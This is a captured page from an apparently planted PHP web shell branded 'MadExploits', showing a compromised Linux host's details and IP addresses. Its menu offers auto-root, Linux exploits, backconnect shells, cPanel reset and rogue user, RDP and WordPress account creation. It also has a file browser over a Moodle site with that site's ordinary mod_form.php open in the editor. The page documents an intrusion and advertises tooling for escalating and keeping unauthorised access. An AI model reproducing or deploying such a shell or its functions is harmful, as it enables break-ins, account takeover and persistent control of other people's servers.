Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.90
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
mod /
folder /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxr-xr-x
download_folder.php
2.22
KB
-rw-r--r--
edit.php
3.08
KB
-rw-rw-r--
edit_form.php
1.5
KB
-rw-r--r--
index.php
3.44
KB
-rw-rw-r--
lib.php
28.32
KB
-rw-rw-r--
locallib.php
1.56
KB
-rw-r--r--
mod_form.php
4.9
KB
-rw-r--r--
module.js
1.69
KB
-rw-r--r--
readme.txt
1.04
KB
-rw-r--r--
renderer.php
7.3
KB
-rw-rw-r--
settings.php
1.42
KB
-rw-r--r--
styles.css
76
B
-rw-r--r--
version.php
1.17
KB
-rw-rw-r--
view.php
3.03
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mod_form.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Folder configuration form * * @package mod_folder * @copyright 2009 Petr Skoda {@link http://skodak.org} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); require_once ($CFG->dirroot.'/course/moodleform_mod.php'); class mod_folder_mod_form extends moodleform_mod { function definition() { global $CFG; $mform = $this->_form; $config = get_config('folder'); //------------------------------------------------------- $mform->addElement('header', 'general', get_string('general', 'form')); $mform->addElement('text', 'name', get_string('name'), array('size'=>'48')); if (!empty($CFG->formatstringstriptags)) { $mform->setType('name', PARAM_TEXT); } else { $mform->setType('name', PARAM_CLEANHTML); } $mform->addRule('name', null, 'required', null, 'client'); $mform->addRule('name', get_string('maximumchars', '', 255), 'maxlength', 255, 'client'); $this->standard_intro_elements(); //------------------------------------------------------- $mform->addElement('header', 'content', get_string('contentheader', 'folder')); $mform->addElement('filemanager', 'files', get_string('files'), null, array('subdirs'=>1, 'accepted_types'=>'*')); $mform->addElement('select', 'display', get_string('display', 'mod_folder'), array(FOLDER_DISPLAY_PAGE => get_string('displaypage', 'mod_folder'), FOLDER_DISPLAY_INLINE => get_string('displayinline', 'mod_folder'))); $mform->addHelpButton('display', 'display', 'mod_folder'); if (!$this->courseformat->has_view_page()) { $mform->setConstant('display', FOLDER_DISPLAY_PAGE); $mform->hardFreeze('display'); } $mform->setExpanded('content'); // Adding option to show sub-folders expanded or collapsed by default. $mform->addElement('advcheckbox', 'showexpanded', get_string('showexpanded', 'folder')); $mform->addHelpButton('showexpanded', 'showexpanded', 'mod_folder'); $mform->setDefault('showexpanded', $config->showexpanded); // Adding option to enable downloading archive of folder. $mform->addElement('advcheckbox', 'showdownloadfolder', get_string('showdownloadfolder', 'folder')); $mform->addHelpButton('showdownloadfolder', 'showdownloadfolder', 'mod_folder'); $mform->setDefault('showdownloadfolder', true); // Adding option to enable viewing of individual files. $mform->addElement('advcheckbox', 'forcedownload', get_string('forcedownload', 'folder')); $mform->addHelpButton('forcedownload', 'forcedownload', 'mod_folder'); $mform->setDefault('forcedownload', true); //------------------------------------------------------- $this->standard_coursemodule_elements(); //------------------------------------------------------- $this->add_action_buttons(); //------------------------------------------------------- $mform->addElement('hidden', 'revision'); $mform->setType('revision', PARAM_INT); $mform->setDefault('revision', 1); } function data_preprocessing(&$default_values) { if ($this->current->instance) { // editing existing instance - copy existing files into draft area $draftitemid = file_get_submitted_draft_itemid('files'); file_prepare_draft_area($draftitemid, $this->context->id, 'mod_folder', 'content', 0, array('subdirs'=>true)); $default_values['files'] = $draftitemid; } } function validation($data, $files) { $errors = parent::validation($data, $files); // Completion: Automatic on-view completion can not work together with // "display inline" option if (empty($errors['completion']) && array_key_exists('completion', $data) && $data['completion'] == COMPLETION_TRACKING_AUTOMATIC && !empty($data['completionview']) && $data['display'] == FOLDER_DISPLAY_INLINE) { $errors['completion'] = get_string('noautocompletioninline', 'mod_folder'); } return $errors; } }
Close